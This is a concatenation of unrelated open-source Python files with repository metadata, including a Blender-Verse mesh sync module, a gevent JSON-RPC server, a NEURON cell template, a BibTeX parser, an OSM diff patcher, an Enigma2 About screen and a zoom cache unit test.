self.last_edge_ID = self.__create_bpy_layer_ids('edges', 'EdgeIDs')
self.last_face_ID = self.__create_bpy_layer_ids('faces', 'FaceIDs')
# Safe blender layers containing IDs to original mesh
self.bmesh.to_mesh(self.mesh)
self.bmesh.free()
self.bmesh = None
def __create_bpy_layer_ids(self, elems_name, layer_name):
"""
This method creates a Blender layer storing IDs of vertices, edges or faces
:elems_name: this could be 'verts', 'edges' or 'faces'
"""
elems_iter = getattr(self.bmesh, elems_name)
lay = elems_iter.layers.int.new(layer_name)
lay.use_force_default = True
lay.default_value = -1
# Set values in layer
last_elem_id = None
for elem in elems_iter:
last_elem_id = elem.index
elem[lay] = elem.index
return last_elem_id
def get_verse_id_of_vertex(self, bpy_vert):
"""
Return ID of blender vertex at Verse server
"""
layer = self.bmesh.verts.layers.int.get('VertIDs')
return bpy_vert[layer]
def get_verse_id_of_edge(self, bpy_edge):
"""
Return ID of blender edge at Verse server
"""
layer = self.bmesh.edges.layers.int.get('EdgeIDs')
return bpy_edge[layer]
def get_verse_id_of_face(self, bpy_face):
"""
Return ID of blender face at Verse server
"""
layer = self.bmesh.faces.layers.int.get('FaceIDs')
return bpy_face[layer]
def __send_vertex_updates(self):
"""
Try to send updates of geometry and positions of vertices
"""
alive_verts = {}
# Go through bmesh and try to detect new positions of vertices,
# deleted vertices and newly created vertices
for b3d_vert in self.bmesh.verts:
verse_id = self.get_verse_id_of_vertex(b3d_vert)
# New vertex was created. Try to send it to Verse server, store it in cache and save verse ID
if verse_id == -1:
# Update the last vertex ID
self.last_vert_ID += 1
verse_id = self.last_vert_ID
# Send new vertex position to Verse server
self.vertices.items[verse_id] = tuple(b3d_vert.co)
# Store verse vertex ID in bmesh layer
layer = self.bmesh.verts.layers.int.get('VertIDs')
b3d_vert[layer] = verse_id
# Position of vertex was changed?
elif self.vertices.items[verse_id] != tuple(b3d_vert.co):
# This will send updated position of vertex
self.vertices.items[verse_id] = tuple(b3d_vert.co)
# Mark vertex as alive
alive_verts[verse_id] = b3d_vert.index
# Try to find deleted vertices
rem_verts = [vert_id for vert_id in self.vertices.items.keys() if vert_id not in alive_verts]
# This will send unset commands for deleted vertices
for vert_id in rem_verts:
self.vertices.items.pop(vert_id)
if vert_id in self.vertices.id_cache:
self.vertices.id_cache.pop(vert_id)
def __send_edge_updates(self):
"""
Try to send updates of topology (edges)
"""
alive_edges = {}
# Go through bmesh and try to detect changes in edges (new created edges or deleted edges)
for b3d_edge in self.bmesh.edges:
verse_id = self.get_verse_id_of_edge(b3d_edge)
# New edge was created. Try to send it to Verse server
if verse_id == -1:
self.last_edge_ID += 1
verse_id = self.last_edge_ID
# Send new edge to Verse server
self.edges.items[verse_id] = (
self.get_verse_id_of_vertex(b3d_edge.verts[0]),
self.get_verse_id_of_vertex(b3d_edge.verts[1])
)
# Store edge ID in bmesh layer
layer = self.bmesh.edges.layers.int.get('EdgeIDs')
b3d_edge[layer] = verse_id
else:
# Was edge changed?
edge = (
self.get_verse_id_of_vertex(b3d_edge.verts[0]),
self.get_verse_id_of_vertex(b3d_edge.verts[1])
)
if self.edges.items[verse_id] != edge:
self.edges.items[verse_id] = edge
alive_edges[verse_id] = b3d_edge.index
# Try to find deleted edges
rem_edges = [edge_id for edge_id in self.edges.items.keys() if edge_id not in alive_edges]
# This will send unset commands for deleted edges
for edge_id in rem_edges:
self.edges.items.pop(edge_id)
if edge_id in self.edges.id_cache:
self.edges.id_cache.pop(edge_id)
def __send_face_updates(self):
"""
Try to send updates of topology (faces)
"""
def b3d_face_to_tuple(_b3d_face):
_face = None
if len(_b3d_face.verts) == 3:
_face = (
self.get_verse_id_of_vertex(_b3d_face.verts[0]),
self.get_verse_id_of_vertex(_b3d_face.verts[1]),
self.get_verse_id_of_vertex(_b3d_face.verts[2]),
0
)
elif len(_b3d_face.verts) == 4:
_face = tuple(self.get_verse_id_of_vertex(vert) for vert in _b3d_face.verts)
# The last item of the tuple cannot be zero, because zero indicates a triangle.
if _face[3] == 0:
# Rotate the face to get zero to the beginning of the tuple
_face = (_face[3], _face[0], _face[1], _face[2])
else:
# TODO: tessellate the face
print('Error: Face with more than 4 vertices is not supported')
return _face
alive_faces = {}
# Go through bmesh faces and try to detect changes (newly created)
for b3d_face in self.bmesh.faces:
verse_id = self.get_verse_id_of_face(b3d_face)
# New face was created. Try to send it to Verse server
if verse_id == -1:
self.last_face_ID += 1
verse_id = self.last_face_ID
self.quads.items[verse_id] = b3d_face_to_tuple(b3d_face)
# Store face ID in bmesh layer
layer = self.bmesh.faces.layers.int.get('FaceIDs')
b3d_face[layer] = verse_id
# Update id cache
self.quads.id_cache[verse_id] = b3d_face
else:
# Was face changed?
face = b3d_face_to_tuple(b3d_face)
if self.quads.items[verse_id] != face:
self.quads.items[verse_id] = face
alive_faces[verse_id] = b3d_face.index
# Try to find deleted faces
rem_faces = [face_id for face_id in self.quads.items.keys() if face_id not in alive_faces]
# This will send unset commands for deleted faces
for face_id in rem_faces:
self.quads.items.pop(face_id)
if face_id in self.quads.id_cache:
self.quads.id_cache.pop(face_id)
def clear_ID_cache(self):
"""
This method clear cache with references on vertices, edges and faces
"""
self.vertices.id_cache = {}
self.edges.id_cache = {}
self.quads.id_cache = {}
def update_references(self):
"""
This method tries to update references at bmesh, when old bmesh was removed
"""
if self.bmesh is None:
if bpy.context.edit_object is not None and \
bpy.context.edit_object.data == self.mesh:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
else:
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
self.bm_from_edit_mesh = False
else:
try:
self.bmesh.verts
except ReferenceError:
if bpy.context.edit_object is not None and \
bpy.context.edit_object.data == self.mesh:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
else:
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
self.bm_from_edit_mesh = False
self.clear_ID_cache()
def send_updates(self):
"""
Try to send update of edit mesh to Verse server
"""
if self.bmesh is None:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
else:
if self.bm_from_edit_mesh is False:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
self.clear_ID_cache()
else:
# Check if bmesh is still fresh
try:
self.bmesh.verts
except ReferenceError:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.clear_ID_cache()
self.__send_vertex_updates()
self.__send_edge_updates()
self.__send_face_updates()
def create_empty_b3d_mesh(self, object_node):
"""
Create empty mesh and create blender layers for entity IDs
"""
# Mesh should be empty ATM
self.mesh = object_node.obj.data
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
# Create layers for verse IDs
vert_lay = self.bmesh.verts.layers.int.new('VertIDs')
vert_lay.use_force_default = True
vert_lay.default_value = -1
edge_lay = self.bmesh.edges.layers.int.new('EdgeIDs')
edge_lay.use_force_default = True
edge_lay.default_value = -1
face_lay = self.bmesh.faces.layers.int.new('FaceIDs')
face_lay.use_force_default = True
face_lay.default_value = -1
# Save blender layers containing IDs to the original mesh
self.bmesh.to_mesh(self.mesh)
self.bmesh.free()
self.bmesh = None
@classmethod
def cb_receive_node_link(cls, session, parent_node_id, child_node_id):
"""
When the link between nodes is changed, try to create the mesh.
"""
mesh_node = super(VerseMesh, cls).cb_receive_node_link(
session=session,
parent_node_id=parent_node_id,
child_node_id=child_node_id
)
try:
object_node = object3d.VerseObject.objects[parent_node_id]
except KeyError:
pass
else:
mesh_node.create_empty_b3d_mesh(object_node)
mesh_node.mesh.verse_node_id = child_node_id
object_node.mesh_node = mesh_node
return mesh_node
@classmethod
def cb_receive_node_create(cls, session, node_id, parent_id, user_id, custom_type):
"""
When a new mesh node is created at the Verse server, this callback method is called.
"""
# Call parent class
mesh_node = super(VerseMesh, cls).cb_receive_node_create(
session=session,
node_id=node_id,
parent_id=parent_id,
user_id=user_id,
custom_type=custom_type
)
# When this mesh was created at different Blender, then mesh_node does
# not have valid reference at blender mesh data block
if mesh_node.mesh is None:
try:
object_node = object3d.VerseObject.objects[parent_id]
except KeyError:
# The object was not created yet
pass
else:
mesh_node.create_empty_b3d_mesh(object_node)
mesh_node.mesh.verse_node_id = node_id
object_node.mesh_node = mesh_node
return mesh_node
def draw_IDs(self, context, obj):
"""
This method draws Verse IDs of vertices, edges and faces
"""
font_id, font_size, my_dpi = 0, 12, 72
self.update_references()
vert_id_layer = self.bmesh.verts.layers.int.get('VertIDs')
edge_id_layer = self.bmesh.edges.layers.int.get('EdgeIDs')
face_id_layer = self.bmesh.faces.layers.int.get('FaceIDs')
bgl.glColor3f(1.0, 1.0, 0.0)
for vert_id, vert_co in self.vertices.items.items():
coord_2d = location_3d_to_region_2d(
context.region,
context.space_data.region_3d,
obj.matrix_world * mathutils.Vector(vert_co))
b3d_vert = self.vertices.b3d_vertex(vert_id)
if b3d_vert is not None:
b3d_vert_id = b3d_vert[vert_id_layer]
else:
b3d_vert_id = None
# When coordinates are not outside window, then draw the ID of vertex
if coord_2d is not None:
blf.size(font_id, font_size, my_dpi)
blf.position(font_id, coord_2d[0] + 2, coord_2d[1] + 2, 0)
blf.draw(font_id, str((vert_id, b3d_vert_id)))
bgl.glColor3f(0.0, 1.0, 0.0)
for edge_id, edge_verts in self.edges.items.items():
vert1 = self.vertices.items[edge_verts[0]]
vert2 = self.vertices.items[edge_verts[1]]
edge_co = mathutils.Vector((
(vert2[0] + vert1[0]) / 2.0,
(vert2[1] + vert1[1]) / 2.0,
(vert2[2] + vert1[2]) / 2.0))
b3d_edge = self.edges.b3d_edge(edge_id)
if b3d_edge is not None:
b3d_edge_id = b3d_edge[edge_id_layer]
else:
b3d_edge_id = None
coord_2d = location_3d_to_region_2d(
context.region,
context.space_data.region_3d,
obj.matrix_world * edge_co)
# When coordinates are not outside window, then draw the ID of edge
if coord_2d is not None:
blf.size(font_id, font_size, my_dpi)
blf.position(font_id, coord_2d[0] + 2, coord_2d[1] + 2, 0)
blf.draw(font_id, str((edge_id, b3d_edge_id)))
bgl.glColor3f(0.0, 1.0, 1.0)
for face_id, face_verts in self.quads.items.items():
if face_verts[3] == 0:
vert1 = self.vertices.items[face_verts[0]]
vert2 = self.vertices.items[face_verts[1]]
vert3 = self.vertices.items[face_verts[2]]
face_co = mathutils.Vector((
(vert1[0] + vert2[0] + vert3[0]) / 3.0,
(vert1[1] + vert2[1] + vert3[1]) / 3.0,
(vert1[2] + vert2[2] + vert3[2]) / 3.0
))
else:
vert1 = self.vertices.items[face_verts[0]]
vert2 = self.vertices.items[face_verts[1]]
vert3 = self.vertices.items[face_verts[2]]
vert4 = self.vertices.items[face_verts[3]]
face_co = mathutils.Vector((
(vert1[0] + vert2[0] + vert3[0] + vert4[0]) / 4.0,
(vert1[1] + vert2[1] + vert3[1] + vert4[1]) / 4.0,
(vert1[2] + vert2[2] + vert3[2] + vert4[2]) / 4.0
))
b3d_face = self.quads.find_b3d_face(face_id)
if b3d_face is not None:
b3d_face_id = b3d_face[face_id_layer]
else:
b3d_face_id = None
coord_2d = location_3d_to_region_2d(
context.region,
context.space_data.region_3d,
obj.matrix_world * face_co)
# When coordinates are not outside window, then draw the ID of face
if coord_2d is not None:
blf.size(font_id, font_size, my_dpi)
blf.position(font_id, coord_2d[0] + 2, coord_2d[1] + 2, 0)
blf.draw(font_id, str((face_id, b3d_face_id)))
# List of Blender classes in this submodule
classes = ()
def init_properties():
"""
Init properties in blender object data type
"""
bpy.types.Mesh.verse_node_id = bpy.props.IntProperty(
name="ID of verse mesh node",
default=-1,
description="ID of node representing mesh at Verse server"
)
def register():
"""
This method register all methods of this submodule
"""
for c in classes:
bpy.utils.register_class(c)
init_properties()
def unregister():
"""
This method unregister all methods of this submodule
"""
for c in classes:
bpy.utils.unregister_class(c)
if __name__ == '__main__':
register()
|
verse/verse-blender
|
io_verse/mesh.py
|
Python
|
gpl-2.0
| 36,256
|
#from account.models import User
from sqlalchemy.sql import func
from flask import Flask
from app import *
class User(db.Model):
__tablename__ = "user"
__table_args__ = {"useexisting" : True}
id = db.Column(db.Integer,primary_key=True)
username = db.Column(db.String(128))
email = db.Column(db.String(128))
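# Illustrative usage sketch (assumes the app module exposes a configured `db`):
#   u = User(username="alice", email="alice@example.com")
#   db.session.add(u)
#   db.session.commit()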
|
mehtapgundogan/Tellal
|
app/account/models.py
|
Python
|
gpl-2.0
| 313
|
#!/usr/bin/env python
# encoding: utf-8
"""
Simple yet high-performance JSON-RPC v1.0 server/client
"""
from gevent import monkey, server, socket as gsocket, Timeout
monkey.patch_all()
import logging
logger = logging.getLogger("RPC")
import cjson
import socket
class RPCException(Exception): pass
class MethodAlreadyRegisted(RPCException): pass
class MethodNotRegistered(RPCException): pass
class RemoteTimeout(RPCException): pass
class Dispatcher(object):
def __init__(self):
self.funcs = {}
def call(self, func_name, *args):
try:
f = self.funcs[func_name]
except KeyError:
raise MethodNotRegistered("func name:%s not registered" % func_name)
return f(*args)
def register(self, f, name=None):
if not callable(f):
raise TypeError("%s is not callable object", f)
if not name:
name = f.__name__
if name in self.funcs:
raise MethodAlreadyRegisted("func name:%s already registered" % name)
logger.info("register func: %s", name)
self.funcs[name] = f
def register_module(self, module_name):
import importlib
m = importlib.import_module(module_name)
for k, v in m.__dict__.items():
if not k.startswith("_") and callable(v):
self.register(v, module_name +'.'+ k)
def __call__(self, sock, address):
rfile = sock.makefile("rb", -1)
logger.debug("new connection %s", address)
while not sock.closed:
try:
data = rfile.readline()
if len(data) == 0:
logger.info("connection %s closed", address)
break
logger.debug('read %d from %s', len(data), address)
except socket.error as err:
logger.warn(err)
return
try:
msg = cjson.decode(data)
if not isinstance(msg, dict):
logger.warn("not valid rpc request %s", msg)
continue
except cjson.DecodeError as err:
logger.debug(err)
return
msg['result'] = None
msg['error'] = None
if ('params' in msg and
'method' in msg and
'id' in msg ):
try:
method = msg.pop('method')
result = self.call(method, *msg.pop("params"))
msg['result'] = result
except Exception as err:
logger.error(err, exc_info=True)
msg['error'] = u"%s %s " % (err.__class__.__name__, err.message)
else:
err = "not valid msg %s" % msg
msg['error'] = err
sock.sendall(cjson.encode(msg)+'\n')
default_dispatcher = Dispatcher()
register = default_dispatcher.register
register_module = default_dispatcher.register_module
class Client(object):
"""
Client
"""
def __init__(self, dest, timeout=30, **kwargs):
"""
:params dest:
:params timeout:
"""
self.dest = dest
self.sock = gsocket.socket(**kwargs)
self.rfile = self.sock.makefile("rb", -1)
self.sock.connect(dest)
self.timeout = timeout
self.id = 0
def __call__(self, method, *args):
self.id += 1
msg = dict(method=method,
id=self.id,
params=args)
with Timeout(self.timeout, RemoteTimeout):
self.sock.send(cjson.encode(msg)+'\n')
rsp = cjson.decode(self.rfile.readline())
if rsp['error']:
raise RPCException(rsp['error'])
return rsp['result']
def new_server(dispatcher, address, port, **kwargs):
"""
:params dispatcher:
:params address:
:params port:
:params kwargs:
"""
s = server.StreamServer((address, int(port)), dispatcher, **kwargs)
return s
def _main():
import argparse
parser = argparse.ArgumentParser()
add = parser.add_argument
add('-d', '--debug', default=False, action='store_true')
add('--timeout', default=30, type=int, metavar="seconds")
add('address')
add('method', nargs="?")
add('params', nargs="*")
add('-m', default='', metavar='register module')
add('-j', '--json', action="store_true", default=False)
add('-l', '--list', action="store_true", default=False)
"""
[parser.add_argument(i[0], default=i[1], help=i[2])
for i in [('-b', '127.0.0.1:8080', 'endpoint that server bindto'),
('-m', 'time', 'register module'),
('-c', '', 'connect endpoint'),
('-i', '', 'invoke method name'),
('-a', '', 'args')]]
"""
args = parser.parse_args()
if not args.address:
parser.print_help()
exit()
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
if args.m:
register_module(args.m)
rpc = new_server(default_dispatcher, *args.address.split(":"))
rpc.serve_forever()
else:
client = Client(tuple(args.address.split(":")), args.timeout)
params = args.params
if args.list:
params = [params]
elif args.json and len(params) == 1:
params = cjson.decode(params[0])
logger.info(client(args.method, *params))
if __name__ == '__main__':
_main()
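# Illustrative usage sketch (not part of the original module):
# server side:
#   register(lambda a, b: a + b, name="add")
#   new_server(default_dispatcher, "127.0.0.1", "8080").serve_forever()
# client side:
#   c = Client(("127.0.0.1", 8080))
#   c("add", 2, 3)  # -> 5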
|
mengzhuo/justrpc
|
justrpc.py
|
Python
|
gpl-2.0
| 5,562
|
import numpy as np
from neuron import h
import math
def lambda_f(section, freq):
if h.n3d() < 2:
return 1e5*math.sqrt(section.diam/(math.pi*4*freq*section.Ra*section.cm))
else:
x1 = h.arc3d(0)
d1 = h.diam3d(0)
lam = 0
for i in range(int(h.n3d())):
x2 = h.arc3d(i)
d2 = h.diam3d(i)
lam += (x2 - x1)/math.sqrt(d1 + d2)
x1 = x2
d1 = d2
lam *= math.sqrt(2) * 1e-5*math.sqrt(4*math.pi*freq*section.Ra*section.cm)
return section.L / lam
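# Illustrative helper (a hedged sketch of NEURON's common d_lambda rule, not
# part of the original file): choose nseg so each segment spans at most
# d_lambda length constants at freq Hz; assumes `sec` is a NEURON section.
def set_nseg_by_d_lambda(sec, freq=100.0, d_lambda=0.1):
    sec.push()  # lambda_f reads the currently accessed section via h.n3d()
    nseg = int((sec.L/(d_lambda*lambda_f(sec, freq)) + 0.9)/2)*2 + 1  # odd
    h.pop_section()
    sec.nseg = nseg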
class Cell(object):
"""Generic cell template."""
def __init__(self):
self.x, self.y, self.z = 0, 0, 0
self.synlist = []
self.all = h.SectionList()
self.create_sections()
self.build_topology()
self.build_subsets()
self.define_geometry()
self.define_biophysics()
self.create_synapses()
#
def create_sections(self):
"""Create the sections of the cell. Remember to do this
in the form::
h.Section(name='soma', cell=self)
"""
raise NotImplementedError("create_sections() is not implemented.")
#
def build_topology(self):
"""Connect the sections of the cell to build a tree."""
raise NotImplementedError("build_topology() is not implemented.")
#
def define_geometry(self):
"""Set the 3D geometry of the cell."""
raise NotImplementedError("define_geometry() is not implemented.")
#
def define_biophysics(self):
"""Assign the membrane properties across the cell."""
raise NotImplementedError("define_biophysics() is not implemented.")
#
def create_synapses(self):
"""Subclasses should create synapses (such as ExpSyn) at various
segments and add them to self.synlist."""
pass # Ignore if child does not implement.
#
def build_subsets(self):
"""Build subset lists. This defines 'all', but subclasses may
want to define others. If overridden, call super() to include 'all'."""
self.all.wholetree(sec=self.soma)
#
def connect2target(self, source_section, target, thresh=10):
"""Make a new NetCon with this cell's membrane
potential at the soma as the source (i.e. the spike detector)
onto the target passed in (i.e. a synapse on a cell).
Subclasses may override with other spike detectors."""
nc = h.NetCon(source_section(1)._ref_v, target, sec = source_section)
nc.threshold = thresh
return nc
#
def is_art(self):
"""Flag to check if we are an integrate-and-fire artificial cell."""
return 0
#
def set_position(self, x, y, z):
"""
Set the base location in 3D and move all other
parts of the cell relative to that location.
"""
for sec in self.all:
sec.push()
#print('secname = %s, h.n3d = %d' % (h.secname(), h.n3d()))
for i in range(int(h.n3d())):
h.pt3dchange(i,
x - self.x + h.x3d(i),
y - self.y + h.y3d(i),
z - self.z + h.z3d(i),
h.diam3d(i), sec=sec)
h.pop_section()
#h.define_shape()
self.x, self.y, self.z = x, y, z
#
    def rotateZ(self, theta):
        """Rotate the cell about the Z axis."""
        c, s = math.cos(theta), math.sin(theta)
        rot_m = np.array([[c, -s], [s, c]])  # standard 2D rotation matrix
        for sec in self.all:
            for i in range(int(h.n3d(sec=sec))):
                xy = np.dot(rot_m, [h.x3d(i, sec=sec), h.y3d(i, sec=sec)])
                h.pt3dchange(i, float(xy[0]), float(xy[1]), h.z3d(i, sec=sec),
                             h.diam3d(i, sec=sec), sec=sec)
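# Minimal subclass sketch (illustrative; `BallStick` and its values come from
# the standard NEURON ball-and-stick tutorial, not from this file):
#   class BallStick(Cell):
#       def create_sections(self):
#           self.soma = h.Section(name='soma', cell=self)
#           self.dend = h.Section(name='dend', cell=self)
#       def build_topology(self):
#           self.dend.connect(self.soma(1))
#       def define_geometry(self):
#           self.soma.L = self.soma.diam = 12.6157
#           self.dend.L, self.dend.diam = 200.0, 1.0
#       def define_biophysics(self):
#           for sec in self.all:
#               sec.Ra, sec.cm = 100, 1
#           self.soma.insert('hh')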
|
penguinscontrol/Spinal-Cord-Modeling
|
Python/cell_template.py
|
Python
|
gpl-2.0
| 3,715
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright 2011 Daniel Foreman-Mackey and Michael Gorelick
#
# This is part of pyarxiv.
#
# pyarxiv is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# pyarxiv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyarxiv. If not, see <http://www.gnu.org/licenses/>.
#
"""
bibparser.py
Created by Dan F-M on 2011-01-16.
"""
import re
class BibTex:
def __init__(self,fn):
self.fn = fn
self.parse()
    def parse(self):
        self.bib = []
        entry = None
        with open(self.fn) as f:
            for line in f:
                if line[0] == '@':
                    if entry is not None:
                        self.bib.append(entry)
                    entry = {}
                else:
                    c = line.split('=')
                    if len(c) >= 2 and entry is not None:
                        entry[c[0].capitalize().strip().strip(',{}')] = c[1].strip().strip(',{}')
        if entry is not None:
            self.bib.append(entry)
        # print 'Parsed %d entries in %s'%(len(self.bib),self.fn)
if __name__ == "__main__":
import sys
bib = BibTex(sys.argv[1])
|
dfm/pyarxiv
|
bibparser.py
|
Python
|
gpl-2.0
| 1,372
|
#! /usr/bin/python2
# vim: fileencoding=utf-8 encoding=utf-8 et sw=4
# Copyright (C) 2009 Jacek Konieczny <jajcus@jajcus.net>
# Copyright (C) 2009 Andrzej Zaborowski <balrogg@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
Patches .osc files with .diff.xml files resulting from an upload of
a previous chunk of a multipart upload.
"""
__version__ = "$Revision: 21 $"
import sys
import codecs
import locale
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
encoding = locale.getlocale()[1]
sys.stdout = codecs.getwriter(encoding)(sys.stdout, errors = "replace")
sys.stderr = codecs.getwriter(encoding)(sys.stderr, errors = "replace")
if len(sys.argv) < 2 or sys.argv[1] == "--help":
    print >>sys.stderr, u"Synopsis:"
    print >>sys.stderr, u"  %s <file.diff.xml> [osm-files-to-patch...]" % sys.argv[0]
    sys.exit(1)
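# The relevant .diff.xml lines look roughly like this (illustrative; attribute
# order may vary):
#   <node old_id="-123" new_id="4567890" new_version="1"/>
# Only the old_id/new_id pair is extracted below, by plain string slicing.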
dd = {}
diff = open(sys.argv[1], "r")
sys.stdout.write("Parsing diff\n")
for line in diff:
oldpos = line.find("old_id=\"")
newpos = line.find("new_id=\"")
if oldpos < 0 or newpos < 0:
continue
# For the moment assume every element is operated on only
# once in a changeset (TODO)
old = line[oldpos + 8:]
new = line[newpos + 8:]
old = old[:old.find("\"")]
new = new[:new.find("\"")]
dd[old] = new
for f in sys.argv[2:]:
sys.stdout.write("Parsing " + f + "\n")
change = open(f, "r")
newchange = open(f + ".diffed", "w")
for line in change:
refpos = line.find("ref=\"")
if refpos > -1:
ref = line[refpos + 5:]
ref = ref[:ref.find("\"")]
if ref in dd:
line = line.replace("ref=\"" + ref + "\"", "ref=\"" + dd[ref] + "\"")
newchange.write(line)
newchange.close()
|
OSMBrasil/IJSN_road_import
|
scripts/upload/diffpatch.py
|
Python
|
gpl-2.0
| 2,414
|
import matplotlib.pyplot as plt
import cv2
from skimage.feature import hog
# from skimage import data
image = cv2.imread("MIT/Train/per00001.ppm", cv2.COLOR_BAYER_RG2GRAY)
image = cv2.resize(image, (64, 128))
fd, hog_image = hog(image, orientations=8, pixels_per_cell=(16, 16),
cells_per_block=(1, 1), visualise=True)
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 4))
ax1.axis('off')
ax1.imshow(image, cmap=plt.cm.gray)
ax1.set_title('Input image')
# Rescale histogram for better display
# hog_image_rescaled = exposure.rescale_intensity(hog_image, in_range=(0, 0.02))
ax2.axis('off')
# ax2.imshow(hog_image_rescaled, cmap=plt.cm.gray)
ax2.imshow(hog_image, cmap=plt.cm.gray)
ax2.set_title('Histogram of Oriented Gradients')
plt.show()
|
HDLynx/sharingan
|
HOG3.py
|
Python
|
gpl-2.0
| 765
|
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Sources.StaticText import StaticText
from Components.Harddisk import harddiskmanager
from Components.NimManager import nimmanager
from Components.About import about
from Components.ScrollLabel import ScrollLabel
from Components.config import config
from Tools.StbHardware import getFPVersion
class About(Screen):
def __init__(self, session):
Screen.__init__(self, session)
		boxtype_names = {
			'gb800solo': 'GigaBlue HD 800solo',
			'gb800se': 'GigaBlue HD 800se',
			'gb800ue': 'GigaBlue HD 800ue',
			'gbquad': 'GigaBlue HD Quad',
			'gbquadplus': 'GigaBlue HD Quad Plus',
			'gb800seplus': 'GigaBlue HD 800se Plus',
			'gb800ueplus': 'GigaBlue HD 800ue Plus',
		}
		boxtype = config.misc.boxtype.value
		if boxtype in boxtype_names:
			AboutText = _("Hardware: ") + " " + boxtype_names[boxtype] + "\n"
		else:
			AboutText = _("Hardware: ") + about.getHardwareTypeString() + "\n"
AboutText += _("Image: ") + about.getImageTypeString() + "\n"
AboutText += _("Kernel version: ") + about.getKernelVersionString() + "\n"
EnigmaVersion = "GUI Build: " + about.getEnigmaVersionString()
self["EnigmaVersion"] = StaticText(EnigmaVersion)
AboutText += EnigmaVersion + "\n"
ImageVersion = _("Last upgrade: ") + about.getImageVersionString()
self["ImageVersion"] = StaticText(ImageVersion)
AboutText += ImageVersion + "\n"
fp_version = getFPVersion()
if fp_version is None:
fp_version = ""
else:
fp_version = _("Frontprocessor version: %d") % fp_version
AboutText += fp_version + "\n"
self["FPVersion"] = StaticText(fp_version)
self["TunerHeader"] = StaticText(_("Detected NIMs:"))
AboutText += "\n" + _("Detected NIMs:") + "\n"
nims = nimmanager.nimList()
for count in range(len(nims)):
if count < 4:
self["Tuner" + str(count)] = StaticText(nims[count])
else:
self["Tuner" + str(count)] = StaticText("")
AboutText += nims[count] + "\n"
self["HDDHeader"] = StaticText(_("Detected HDD:"))
AboutText += "\n" + _("Detected HDD:") + "\n"
hddlist = harddiskmanager.HDDList()
hddinfo = ""
if hddlist:
for count in range(len(hddlist)):
if hddinfo:
hddinfo += "\n"
hdd = hddlist[count][1]
if int(hdd.free()) > 1024:
hddinfo += "%s\n(%s, %d GB %s)" % (hdd.model(), hdd.capacity(), hdd.free()/1024, _("free"))
else:
hddinfo += "%s\n(%s, %d MB %s)" % (hdd.model(), hdd.capacity(), hdd.free(), _("free"))
else:
hddinfo = _("none")
self["hddA"] = StaticText(hddinfo)
AboutText += hddinfo
self["AboutScrollLabel"] = ScrollLabel(AboutText)
self["actions"] = ActionMap(["SetupActions", "ColorActions", "DirectionActions"],
{
"cancel": self.close,
"ok": self.close,
"green": self.showTranslationInfo,
"up": self["AboutScrollLabel"].pageUp,
"down": self["AboutScrollLabel"].pageDown
})
def showTranslationInfo(self):
self.session.open(TranslationInfo)
class TranslationInfo(Screen):
def __init__(self, session):
Screen.__init__(self, session)
# don't remove the string out of the _(), or it can't be "translated" anymore.
# TRANSLATORS: Add here whatever should be shown in the "translator" about screen, up to 6 lines (use \n for newline)
info = _("TRANSLATOR_INFO")
if info == "TRANSLATOR_INFO":
info = "(N/A)"
infolines = _("").split("\n")
infomap = {}
for x in infolines:
l = x.split(': ')
if len(l) != 2:
continue
(type, value) = l
infomap[type] = value
print infomap
self["TranslationInfo"] = StaticText(info)
translator_name = infomap.get("Language-Team", "none")
if translator_name == "none":
translator_name = infomap.get("Last-Translator", "")
self["TranslatorName"] = StaticText(translator_name)
self["actions"] = ActionMap(["SetupActions"],
{
"cancel": self.close,
"ok": self.close,
})
|
postla/e2-gui
|
lib/python/Screens/About.py
|
Python
|
gpl-2.0
| 4,213
|
import mox
from unittest import TestCase
from kazoo.client import KazooClient
from zoom.www.cache.global_cache import GlobalCache
from test.test_utils import ConfigurationMock, EventMock, FakeMessage
class GlobalCacheTest(TestCase):
def setUp(self):
self.mox = mox.Mox()
self.socket_client1 = self.mox.CreateMockAnything()
self.socket_client2 = self.mox.CreateMockAnything()
self.web_socket_clients = [self.socket_client1, self.socket_client2]
self.configuration = ConfigurationMock
self.zoo_keeper = self.mox.CreateMock(KazooClient)
def tearDown(self):
self.mox.UnsetStubs()
def test_construct(self):
self.mox.ReplayAll()
self._create_global_cache()
self.mox.VerifyAll()
def test_get_mode(self):
self.configuration.global_mode_path = "mode/path"
cache = self._create_global_cache()
self.zoo_keeper.connected = True
self.zoo_keeper.get("mode/path",
watch=mox.IgnoreArg()).AndReturn((None, None))
self.mox.ReplayAll()
cache.get_mode()
self.mox.VerifyAll()
def test_on_update(self):
event = EventMock()
cache = self._create_global_cache()
self.socket_client1.write_message("globalmodejson")
self.socket_client2.write_message("globalmodejson")
self.mox.StubOutWithMock(cache, "get_mode")
cache.get_mode().AndReturn(FakeMessage("globalmodejson"))
self.mox.ReplayAll()
cache.on_update(event)
self.mox.VerifyAll()
def _create_global_cache(self):
return GlobalCache(self.configuration, self.zoo_keeper,
self.web_socket_clients)
|
spottradingllc/zoom
|
test/cache/global_cache_test.py
|
Python
|
gpl-2.0
